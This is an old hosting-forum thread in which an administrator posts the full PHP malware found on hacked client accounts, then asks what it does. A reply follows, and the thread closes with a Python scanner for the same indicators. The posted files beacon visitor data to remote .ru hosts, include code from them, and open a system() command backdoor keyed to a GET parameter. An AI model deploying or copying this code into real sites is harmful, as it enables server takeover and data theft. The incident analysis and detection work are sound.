
Create.PHP, Base.PHP and .htaccess

Discussion in 'General Discussion' started by blakeblake, Jan 11, 2006.

  1. blakeblake

    Hi Guys, Gals And Guys Who Are Sometimes Gals..

    A few clients had been hacked recently on one particular server that I have. At first I figured it was just random attacks, as the types of programs that were hacked were all different. Until I noticed that each of these hacked accounts had the same few files that were put there on the same date and had the same ownership/permissions. The files were create.php, download.php, base.php and then a .htaccess file created to reference them. The files were all set to full 777 permissions and they were owned by nobody.

    Below is the content from all the files

    The base.php and create.php contents are the same:

    Code:
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

    .htaccess contents:

    Code:
    Options -MultiViews
    ErrorDocument 404 //projects/Calendar/includes/create.php

    download.php contents:

    Code:
    <?php
    error_reporting(0);
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>

    Has anybody else noticed these types of files yet? If not, could anybody possibly inform me what these files are really trying to do, as I am obviously not quite sure.

    Thanks as always
    Mark
     
  2. neutro

    This script got injected due to wrong permissions on folders (777). I am also having this problem.
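
A triage sketch for the indicators described in this thread, added here as an example and not posted by either participant. It flags PHP files that include() a base64-decoded string or pass a request parameter to system(), and .htaccess files whose ErrorDocument points at a PHP script, and notes when a matching file is world-writable. The function names and the constructed sample tree are assumptions of this example.

```python
import os, pathlib, re, stat, tempfile
# Indicators taken from the files posted in this thread.
PHP_PATTERNS = {
    "include() of a base64-decoded string": re.compile(
        rb"include(?:_once)?\s*\(\s*base64_decode\s*\(", re.I),
    "system() on a request parameter": re.compile(
        rb"system\s*\(\s*\$_(?:GET|POST|REQUEST)\b", re.I),
}
HTACCESS_RX = re.compile(rb"^\s*ErrorDocument\s+\d{3}\s+\S+\.php\b", re.I | re.M)

def check_file(path):
    """Return the reasons a regular file matches the indicators (empty if none)."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return []
    with open(path, "rb") as fh:
        data = fh.read(1 << 20)  # droppers like these are small; cap the read
    name, reasons = os.path.basename(path).lower(), []
    if name.endswith(".php"):
        reasons = [why for why, rx in PHP_PATTERNS.items() if rx.search(data)]
    elif name == ".htaccess" and HTACCESS_RX.search(data):
        reasons = ["ErrorDocument handled by a PHP script"]
    if reasons and st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable (mode %o)" % stat.S_IMODE(st.st_mode))
    return reasons

def scan(root):
    """Walk root and return {path: reasons} for every file that matches."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for path in (os.path.join(dirpath, fn) for fn in files):
            try:
                reasons = check_file(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if reasons:
                hits[path] = reasons
    return hits

def build_sample_tree():
    """Constructed docroot for the demo; the PHP bodies are inert samples."""
    root = tempfile.mkdtemp()
    samples = {"index.php": b"<?php include('header.php'); ?>",
               "create.php": b'<? include(base64_decode("Y29uc3RydWN0ZWQ=")."/?x"); ?>',
               ".htaccess": b"Options -MultiViews\nErrorDocument 404 /inc/create.php\n"}
    for name, body in samples.items():
        pathlib.Path(root, name).write_bytes(body)
    os.chmod(os.path.join(root, "create.php"), 0o777)
    return root
```

Calling `scan()` on an account's document root returns the matching paths with their reasons. An ErrorDocument that points at PHP also appears in legitimate applications, so that hit is a lead to review rather than proof of compromise.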
     